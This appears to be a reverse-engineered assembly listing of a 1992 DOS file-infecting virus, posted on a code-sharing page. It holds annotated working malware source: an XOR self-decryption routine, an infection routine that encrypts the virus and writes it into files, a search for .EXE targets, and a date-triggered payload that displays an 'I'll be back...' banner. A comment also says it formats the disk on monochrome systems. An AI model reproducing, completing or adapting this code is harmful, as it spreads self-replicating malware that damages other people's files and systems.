📄 hr.asm
字号:
;NAME: HR.DEC
;FILE SIZE: 0062Ch - 1580d
;START (CS:IP): 00100h
;CODE END: 0072Ch
;CODE ORIGIN: 00100h
;DATE: Sun Aug 02 17:20:02 1992
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING
P00100 PROC
ORG 0100h
START: JMP Short BEGIN
;---------------------------------------------------
NOP
ENCRKEY:DB 0Ch,32h ; 32h may not be needed... ;OR AH,32
BEGIN: CALL CRYPT ; Decrypt the virus
JMP H00520
;---------------------------------------------------
CRYPT: PUSH CX
MOV SI,OFFSET MESSAGE
MOV DI,SI
MOV CX,0766h
CLD
LOOP_1: LODSW
XOR AX,DS:ENCRKEY ;DS may not be needed
STOSW
DEC CX
JNZ LOOP_1
POP CX
RET
;---------------------------------------------------
INFECT: MOV DX,0100h ;Offset to begin at
MOV BX,DS:[HANDLE] ;BX=File handle
PUSH BX ;I don't know why, BX doesn't change.
MOV CX,062Ch ;CX=number of bytes to write
CALL CRYPT ;Encrypt before saving
POP BX ;I don't know why, BX doesn't change.
MOV AX,4000h ;AH = 40h, write to file.
INT 21h ;Infect the file.
PUSH BX ;Again, BX never changes.
CALL CRYPT ; . . . . . . . . .
POP BX
RET ;RET_Near
;---------------------------------------------------
; This is the big, red, block letters that shows when it goes off.
MESSAGE:
DB 0Fh,10h,18h,19h,1Fh,"I'll be back..."
DB 18h,18h,14h,20h,20h,00Ch,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h
DB 20h,0DEh,10h,19h,05h,14h,19h,05h,0DEh,10h,20h,20h,14h,19h,06h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh,18h,20h,20h,0DEh,10h
DB 20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,20h,20h
DB 0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,05h,14h,19h,06h,16h,0DEh
DB 10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h
DB 05h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,06h,0DEh,18h,20h
DB 20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h
DB 04h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,05h,14h,20h
DB 20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h
DB 20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h
DB 20h,16h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h
DB 0DEh,10h,20h,20h,14h,20h,20h,16h,0DEh,18h,14h,19h,05h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh
DB 10h,19h,05h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h
DB 20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h
DB 19h,05h,16h,0DEh,10h,20h,14h,19h,04h,0DEh,10h,20h,20h,14h,20h,20h
DB 0DEh,10h,20h,20h,14h,20h,20h,0DEh,18h,20h,20h,0DEh,10h,20h,14h,20h,20h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h
DB 04h,14h,20h,20h,0DEh,10h,19h,05h,14h,19h,04h,0DEh,10h,19h,02h,14h
DB 19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,16h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,19h,04h,16h,0DEh,18h,14h
DB 20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h
DB 20h,14h,19h,05h,0DEh,10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,18h,20h,20h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h
DB 0DEh,10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h
DB 20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h
DB 14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h
DB 14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,18h,20h,10h,19h,03h,14h
DB 20h,10h,19h,02h,14h,20h,20h,10h,19h,05h,14h,20h,20h,10h,19h,06h,14h,20h
DB 20h,10h,20h,20h,14h,20h,10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h
DB 02h,14h,20h,10h,19h,02h,14h,20h,20h,10h,20h,20h,14h,20h,10h,19h
DB 03h,14h,20h,20h,10h,19h,06h,14h,20h,20h,10h,19h,04h,14h,20h
DB 10h,19h,02h,14h,20h,20h,18h,20h,10h,19h,03h,14h,20h,10h,19h,02h
DB 14h,20h,10h,19h,06h,14h,20h,10h,19h,07h,14h,20h,10h,19h,02h,14h
DB 20h,10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h,06h,14h,20h
DB 10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h,07h,14h,20h,10h,19h
DB 05h,14h,20h,10h,19h,03h,14h,20h,18h,20h,10h,19h,00Fh,14h,20h,10h,19h
DB 07h,14h,20h,10h,19h,02h,14h,20h,10h,19h,07h,14h,20h,10h,19h,06h
DB 14h,20h,10h,19h,07h,14h,20h,10h,19h,07h,14h,20h,10h,19h,00Ah,14h
DB 20h,18h,20h,10h,19h,00Fh,14h,20h,10h,19h,07h,14h,20h,10h,19h,13h,14h
DB 20h,10h,19h,10h,14h,20h,18h,10h,19h,40h,14h,20h,18h,18h,2Ah
;---------------------------------------------------
DB 00 ;00454
DB "*.EXE" ;00455
DB 00h,"\",00h,03h ;0045A
DB 8 DUP("?") ;0045E 3F
DB " " ;00466 202020
;---------------------------------------------------
;This area is perplexing. Doesn't seem to be ever called, nor read from.
ADC AX,[BP+DI] ;00469 1303 __
ADD [BX+SI],AL ;0046B 0000 __
ADD [BP+SI],CH ;0046D 002A _*
SHR BP,1 ;0046F D1ED __
DEC DX ;00471 4A J
ADC DL,DS:[0E278h] ;00472 121678E2 __x_
PUSH SS ;00476 16 _
ADD [BX+SI],AL ;00477 0000 __
ADD [BX+SI],AL ;00479 0000 __
;---------------------------------------------------
DB "ARMOR" ;0047B 41524D4F52
DB 00h ;00480
DB " " ;00481 2020
DB 00h ;00483
DB 00h ;00484
DB 00h ;00485
DB 00h ;00486
DB 00h ;00487
DB 03h ;00488
DB 8 DUP("?") ;00489 3F
DB "EXE" ;00491 455845
DB 07h ;00494
DB 04h ;00495
DB 00h ;00496
DB "3" ;00497 33
DB 1Fh ;00498
DB "*" ;00499 2A
DB 0D1h ;0049A
DB 0EDh ;0049B
DB "J " ;0049C 4A20
DB 02h ;0049E
DB "x" ;0049F 78
DB 0F0h ;004A0
DB 16h ;004A1
DB 02h ;004A2
DB 00h ;004A3
DB 00h ;004A4
DB 00h ;004A5
DB "SAMPLE3.EXE" ;004A6 53414D504C4533
DB 00h ;004B1
DB 00h ;004B2
DB 9Eh ;004B3
DB "-]" ;004B4 2D5D
DB 04h ;004B6
DB 88h ;004B7
DB 04h ;004B8
DB 9Eh ;004B9
DB "-" ;004BA 2D
DB 00h ;004BB
DB "ARMOR" ;004BC 41524D4F52
DB 00h ;004C1
DB 58 DUP(00h) ;004C2
HANDLE: DB 05h ;004FC
DB 00h ;004FD
DB 02h ;004FE
DB "x" ;004FF 78
DB 0F0h ;00500
DB 16h ;00501
DB " " ;00502 20
DB 00h ;00503
DB 0CDh ;00504
DB " " ;00505 20
DB 00h ;00506
DB 00h ;00507
DB "Written by Dennis Yelle" ;00508 5772697474656E
DB 00h ;0051F
;---------------------------------------------------
; Create new encryption key
H00520: MOV AX,3000h ;00520 B80030 __0
INT 21h ;2-DOS_Ver ;00523 CD21 _!
CMP AL,02h ;00525 3C02 <_
JB H0056B ;00527 7242 rB
MOV AH,2Ch ;00529 B42C _,
INT 21h ;1-Get_Time ;0052B CD21 _!
MOV DS:[0103h],DX ;0052D 89160301 ____
; Check to see if it's the last Friday in month, if so, go off.
H00531: MOV AH,2Ah ;00531 B42A _*
INT 21h ;1-Get_Date ;00533 CD21 _!
CMP DL,19h ;00535 80FA19 ___
JL H0053E ;00538 7C04 |_
CMP AL,05h ;0053A 3C05 <_
JZ H00541 ;0053C 7403 t_
H0053E: JMP H005F2 ;0053E E9B100 ___
;---------------------------------------------------
; GO OFF!
H00541: MOV AH,0Fh ;00541 B40F
INT 10h ;Get current vid mode ;00543 CD10
CMP AL,07h ;00545 3C07
JZ H00568 ;If mono, format ;00547 741F
MOV AX,0003h ;80x25 16 color ;00549 B80300
INT 10h ;Set video mode ;0054C CD10
MOV AH,01h ;0054E B401
MOV CX,0808h ;No cursor ;00550 B90808
INT 10h ;Set cursor size ;00553 CD10
MOV SI,013Ah ;00555 BE3A01
MOV AX,0B800h ;Video segment ;00558 B800B8
MOV ES,AX ;ES_Chg ;0055B 8EC0
MOV DI,0000h ; ;0055D BF0000
MOV CX,0319h ;00560 B91903
CALL H0057E ; . . . . . . . . . ;00563 E81800
JMP Short H00531 ;00566 EBC9
;---------------------------------------------------
H00568: JMP Short H005DC ;00568 EB72 _r
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -